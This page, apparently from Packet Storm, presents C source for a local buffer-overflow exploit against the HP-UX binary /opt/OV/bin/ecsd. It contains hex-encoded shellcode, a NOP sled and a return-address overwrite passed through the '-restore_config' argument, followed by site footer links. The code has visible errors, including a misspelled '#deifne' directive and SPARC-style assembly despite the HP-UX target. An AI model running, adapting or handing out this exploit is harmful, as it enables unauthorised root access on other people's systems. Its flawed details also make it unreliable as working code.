HP/UX local exploit for /opt/OV/bin/ecsd.
2de424af94be9fb6a61cd2c72d940df117c2eeaae50d877ddb06a4652ee9abce/* www.idiotbox.co.il
/opt/OV/bin/ecsd local exploit,
Based on the bugtraq posting,
heavily influenced by solaris exploit code by LSD.
if you seem to have problems with getting ret, try using:
unsigned long int get_sp() { __asm__("or %sp,%sp,%i0");}
or gdb =)
greets go out to:
#b10z #!xor #whitehat
written by sagi (sagi@idiotbox.co.il)
www.idiotbox.co.il */
#define LEN 321
#deifne NOP 158
#define RET 100
#define ALLIGN 2
char shellcode[]=
"\x82\x10\x20\xca\x92\x1a\x40\x09\x90\x0a\x40\x09\x91\xd0\x20\x08"
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08";
char jump[]=
"\x81\xc3\xe0\x08" /* jmp %o7+8 */
"\x90\x10\x00\x0e" /* mov %sp,%o0 */
;
static char nop[]="\x80\x1c\x40\x11";
main(int argc,char **argv){
char buffer[500],adr[4],*b;
int i;
*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+6048+1520;
b=buffer;
for(i=0;i<ALLIGN;i++) *b++=0xff;
for(i=0;i<NOP;i++) *b++=nop[i%4];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
for(i=0;i<ALLIGN;i++) *b++=0xff;
for(i=0;i<RET;i++) *b++=adr[i%4];
*b=0;
execle("/opt/OV/bin/ecsd","-restore_config",buffer,0,0);
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed